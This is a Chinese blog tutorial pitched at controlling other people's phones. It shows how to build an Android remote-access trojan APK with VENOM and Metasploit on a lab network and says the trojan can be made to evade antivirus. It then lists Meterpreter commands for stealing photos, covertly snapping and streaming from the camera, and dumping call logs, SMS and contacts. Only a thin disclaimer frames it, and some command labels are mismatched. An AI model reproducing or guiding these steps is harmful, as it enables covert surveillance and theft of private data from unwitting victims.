标签搜索

【渗透入侵】通过venom|msf渗透入侵别人手机

百趣云
2021-04-12 / 0 评论 / 30 阅读 / 正在检测是否收录...
温馨提示:
本文最后更新于2021年04月12日,已超过71天没有更新,若内容或图片失效,请留言反馈。

听说有人想控制别人手机?今天就出一期教学

………………………………
声明:本教程只供教学使用,严禁非法使用,因非法使用所造成的一切后果自负。
学习本教程就默认同意以上声明内容。
………………………………
1

一、说在前面

(一)制作远控木马的方法有很多种,请根据实际情况灵活运用,不必纠结于工具。
(二)本文所使用的工具是VENOM 1.0.17 - metasploit Shellcode generator/compiller,至少了解一点MSF(Metasploit Framework),方可读懂本文。
(三)本文是在局域网内测试,机器信息如下:
1.攻击机:Kali Linux 2020.04 IP:192.168.31.146
2.目标机:vivo x23 V1809T Android9.0 IP:192.168.31.104
3.物理机:Windows 10 专业版 20H2 IP:192.168.31.183

二、venom在kali linux中的安装

【渗透入侵】远控神器venom的安装

文字教程链接:https://pan.baidu.com/s/1hMvpqJwU5JhPAyHqSYGyVA 提取码:e26m
2

三、木马软件生成过程

1.在VMware中选中kali虚拟机,添加一块网卡,模式为桥接模式。如图1
2.kali中切换网络连接为刚刚添加 的连接,并确定kali虚拟机和物理机在同一网段。如图2
3.切换到venom目录,输入./venom.sh打开venom,主菜单中选择第四项。如图3
4.再新弹出的payload中选择第一项。如图4
5.LHOST中IP地址填写192.168.31.146。如图5
6.LPORT中端口可以随意填写未被占用的端口,这里填写默认的666。如图6
7.NAME中随便填写生成的apk的名字,这里填写默认的signapk。如图7
8.询问是否需要签名,这里选择是。如图8

……
3

……

四、安卓木马软件免杀

4

五、渗透后常用命令

二、安卓常用命令
1.下载截图(如图一图二):
cd /storage/emulated/0/DCIM
download screenshots
2.查看摄像头列表(如图三):webcam_list
3.使用后摄拍照一张(如图四图五):webcam_snap Back Camera
4.开启摄像头视频监控(如图六图七):webcam_stream
5.下载通话记录(如图八图九):dump_calllog 
6.下载短信记录(如图八图九):dump_contacts
7.下载通讯录(如图八图九):dump_sms 
0

评论 (0)

取消